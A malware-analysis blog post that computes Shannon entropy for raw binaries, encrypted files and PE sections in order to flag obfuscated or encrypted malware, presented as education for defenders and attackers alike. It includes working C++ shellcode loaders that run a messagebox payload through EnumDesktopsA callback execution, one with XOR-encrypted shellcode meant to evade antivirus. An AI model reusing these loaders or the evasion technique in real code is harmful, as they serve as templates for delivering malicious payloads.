8 minute read

Hello, cybersecurity enthusiasts and white hackers!

shannon

This post is the result of my own research on Shannon entropy. How to use it for malware analysis in practice.

entropy

Simply said, Shannon entropy is the quantity of information included inside a message, in communication terminology. Entropy is a measure of the unpredictability of the file’s data. The Shannon entropy is named after the famous mathematician Shannon Claude.

entropy and malwares

Now let me unfold a relationship between malwares and entropy. Malware authors are clever and advance and they do many tactics and tricks to hide malware from AV engines. As you know from my previous posts, it’s usually something like payload encryption or function call obfuscation. But at the same time as author is compressing the data as well as inserting some harmful code in the original file author is lowering the unpredictability of data therefore raising the entropy and here we can catch the file based on the entropy value. So, the greater the entropy, the more likely the data is obfuscated or encrypted, and the more probable the file is malicious.

practical examples

So how do you calculate Shannon’s entropy?

formula

which can represent as:

formula

i.e.

formula

is a well known identity of the logarithm.

formula means “The entropy of data X.”.

The right hand of formula represents a summation that sums up:

formula

This is the most important part of the equation, because this is what assigns higher numbers to rarer events and lower numbers to common events. formula represents the proportion of each unique character formula in the input formula.

In the Python language it is looks like this:

import math

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    for byte in data:
        possible[chr(byte)] +=1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue

        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy

Let’s go to create script which calculate Shannon entropy of PE file’s sections. Let’s start with a simpler problem. First of all, for simplicity, let’s calculate Shannon entropy for binary files (entropy.py):

import argparse
import math

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    for byte in data:
        possible[chr(byte)] +=1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue

        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-f','--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            entropy = shannon_entropy(data)
            print(entropy)

As you can see, everything is simple. Just read binary file and calculate Shannon entropy.

demo 1

Let’s say we have information. For simplicity, as usually meow-meow messagebox payload is used by me.

Run:

python3 entropy -f ./meow.bin

shannon

How will this value change if this binary file is encrypted?

Let’s start with XOR encryption. Create simple script (xor.py):

import argparse

## XOR function to encrypt data
def xor(data, key):
    key = str(key)
    l = len(key)
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        ordd = lambda x: x if isinstance(x, int) else ord(x)
        output_str += chr(ordd(current) ^ ord(current_key))
    return output_str

## encrypting
def xor_encrypt(data, key):
    ciphertext = xor(data, key)
    ciphertext_str = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
    print (ciphertext_str)
    return ciphertext

if __name__ == "__main__":
    # key for encrypt/decrypt
    my_secret_key = "mysupersecretkey"
    parser = argparse.ArgumentParser()
    parser.add_argument('-f','--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            # encrypted
            ciphertext = xor_encrypt(data, my_secret_key)
            with open("xor.bin", "wb") as result:
                result.write(ciphertext.encode())

As you can see, just xor binary file and save it as xor.bin. Let’s check:

python3 xor.py -f ./meow.bin
python3 entropy -f ./xor.bin

shannon

shannon

As you can see, entropy is increased from 5.75 to 6.15.

What about AES encryption? Create another script (aes.py):

# AES encryption
import argparse
import hashlib
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad

def aes_encrypt(data, key):
    k = hashlib.sha256(key).digest()
    iv = 16 * '\x00'
    cipher = AES.new(k, AES.MODE_CBC, iv.encode("UTF-8"))
    ciphertext = cipher.encrypt(pad(data, AES.block_size))
    return ciphertext

if __name__ == "__main__":
    # key for encrypt/decrypt
    my_secret_key = get_random_bytes(16)
    parser = argparse.ArgumentParser()
    parser.add_argument('-f','--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        data = f.read()
        if data:
            # encrypted
            ciphertext = aes_encrypt(data, my_secret_key)
            with open("aes.bin", "wb") as result:
                result.write(ciphertext)

It’s also pretty simple: create AES-encrypted binary aes.bin as result. Let’s check:

python3 aes.py -f ./meow.bin
python3 entropy -f ./aes.bin

shannon

As you can see, for AES encryption, entropy is increased from 5.75 to 7.18.

Now i modify my script enropy.py to calculate shannon entropy for sections of pe file:

import argparse
import math
import pefile

def shannon_entropy(data):
    # 256 different possible values
    possible = dict(((chr(x), 0) for x in range(0, 256)))

    for byte in data:
        possible[chr(byte)] +=1

    data_len = len(data)
    entropy = 0.0

    # compute
    for i in possible:
        if possible[i] == 0:
            continue

        p = float(possible[i] / data_len)
        entropy -= p * math.log(p, 2)
    return entropy

def sections_entropy(path):
    pe = pefile.PE(path)
    for section in pe.sections[:3]:
        print(section.Name.decode('utf-8'))
        print("\tvirtual address: " + hex(section.VirtualAddress))
        print("\tvirtual size: " + hex(section.Misc_VirtualSize))
        print("\traw size: " + hex(section.SizeOfRawData))
        print ("\tentropy: " + str(shannon_entropy(section.get_data())))

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-f','--file', required = True, help = "target file")
    args = vars(parser.parse_args())
    target_file = args['file']
    with open(target_file, 'rb') as f:
        sections_entropy(target_file)

For simplicity and demonstration purposes this calculate and print just first 3 sections.

demo 2

As an sample file I used one of my malware from this post:

/*
 * hack.cpp - run shellcode via EnumDesktopA. C++ implementation
 * @cocomelonc
 * https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>

unsigned char my_payload[] =
  // 64-bit meow-meow messagebox
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

int main(int argc, char* argv[]) {
  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, my_payload, sizeof(my_payload));
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
  return 0;
}

Run updated script:

python3 entropy -f ./hack.exe

shannon

I uploaded this file to VirusTotal, which also calculate sections’ entropy:

shannon

As you can see our script is worked perfectly!

I wonder what the Shannon entropy will show if we use one of our AV evasion tricks?

I just create XOR - encrypted payload from meow.bin for simplicity:

shannon

Also add decryption function (hack2.cpp):

/*
 * hack.cpp - run shellcode via EnumDesktopA. C++ implementation
 * @cocomelonc
 * https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>

unsigned char my_payload[] =
  // 64-bit meow-meow messagebox encrypted
  { 0x91, 0x31, 0xf2, 0x91, 0x80, 0x9a, 0x8d, 0x8c, 0x8d, 0xb3, 0x72,
    0x65, 0x74, 0x2a, 0x34, 0x38, 0x3d, 0x2b, 0x22, 0x23, 0x38, 0x54,
    0xa0, 0x16, 0x2d, 0xe8, 0x20, 0x5, 0x4a, 0x23, 0xee, 0x2b, 0x75,
    0x47, 0x3b, 0xfe, 0x22, 0x45, 0x4c, 0x3b, 0xee, 0x11, 0x22, 0x5b,
    0x3c, 0x64, 0xd2, 0x33, 0x27, 0x34, 0x42, 0xbc, 0x38, 0x54, 0xb2,
    0xdf, 0x59, 0x2, 0xe, 0x67, 0x58, 0x4b, 0x24, 0xb8, 0xa4, 0x74,
    0x32, 0x74, 0xb1, 0x87, 0x9f, 0x21, 0x24, 0x32, 0x4c, 0x2d, 0xff,
    0x39, 0x45, 0x47, 0xe6, 0x3b, 0x4f, 0x3d, 0x71, 0xb5, 0x4c, 0xf8,
    0xe5, 0xeb, 0x72, 0x65, 0x74, 0x23, 0xe0, 0xb9, 0x19, 0x16, 0x3b,
    0x74, 0xa0, 0x35, 0x4c, 0xf8, 0x2d, 0x7b, 0x4c, 0x21, 0xff, 0x2b,
    0x45, 0x30, 0x6c, 0xa9, 0x90, 0x29, 0x38, 0x9a, 0xbb, 0x4d, 0x24,
    0xe8, 0x46, 0xed, 0x3c, 0x6a, 0xb3, 0x34, 0x5c, 0xb0, 0x3b, 0x44,
    0xb0, 0xc9, 0x33, 0xb2, 0xac, 0x6e, 0x33, 0x64, 0xb5, 0x53, 0x85,
    0xc, 0x9c, 0x47, 0x3f, 0x76, 0x3c, 0x41, 0x7a, 0x36, 0x5c, 0xb2,
    0x7, 0xb3, 0x2c, 0x55, 0x21, 0xf2, 0x2d, 0x5d, 0x3a, 0x74, 0xa0,
    0x3, 0x4c, 0x32, 0xee, 0x6f, 0x3a, 0x5b, 0x30, 0xe0, 0x25, 0x65,
    0x24, 0x78, 0xa3, 0x4b, 0x31, 0xee, 0x76, 0xfb, 0x2d, 0x62, 0xa2,
    0x24, 0x2c, 0x2a, 0x3d, 0x27, 0x34, 0x23, 0x32, 0x2d, 0x31, 0x3c,
    0x33, 0x29, 0x2d, 0xe0, 0x9e, 0x45, 0x35, 0x39, 0x9a, 0x99, 0x35,
    0x38, 0x2a, 0x2f, 0x4e, 0x2d, 0xf9, 0x61, 0x8c, 0x2a, 0x8d, 0x9a,
    0x8b, 0x36, 0x2c, 0xbe, 0xac, 0x79, 0x73, 0x75, 0x70, 0x5b, 0x3a,
    0xfe, 0xf0, 0x9d, 0x72, 0x65, 0x74, 0x55, 0x29, 0xf4, 0xe8, 0x70,
    0x72, 0x75, 0x70, 0x2d, 0x43, 0xba, 0x24, 0xd9, 0x37, 0xe6, 0x22,
    0x6c, 0x9a, 0xac, 0x25, 0x48, 0xba, 0x34, 0xca, 0x95, 0xc7, 0xd1,
    0x33, 0x9c, 0xa7, 0x28, 0x11, 0x4, 0x12, 0x54, 0x0, 0x1c, 0x1c,
    0x2, 0x51, 0x65, 0x4f, 0x2d, 0x4b, 0x4d, 0x2c, 0x58, 0x74 };


// key for XOR decrypt
char my_secret_key[] = "mysupersecretkey";

// decrypt deXOR function
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
  int j;
  j = 0;
  for (int i = 0; i < data_len; i++) {
    if (j == key_len - 1) j = 0;
    data[i] = data[i] ^ key[j];
    j++;
  }
}

int main(int argc, char* argv[]) {
  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

  // decrypt (deXOR) the payload
  XOR((char *) my_payload, sizeof(my_payload), my_secret_key, sizeof(my_secret_key));

  RtlMoveMemory(mem, my_payload, sizeof(my_payload));
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
  return 0;
}

demo 3

Let’s go to see in action. Compile our new “malware”:

x86_64-w64-mingw32-g++ -O2 hack2.cpp -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

shannon

and calculate entropy:

python3 entropy.py -f ./hack2.exe

shannon

As you can see, in this case, Shannon entropy is increased from 5.95 to 6.02. Perfect! =^..^=

conclusion

As you can see, sometimes entropy can help predict whether a file is malicious or not. It is used in many malware analysis programs.

I hope this post will be helpful for blue teamers and red teamers for better understanding theirs “cat =^..^= and mouse <:3 )~~~” game (or war?).

This is a practical case for educational purposes only.

XOR cipher
AES
AV engines evasion: part 1
Shannon entropy
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine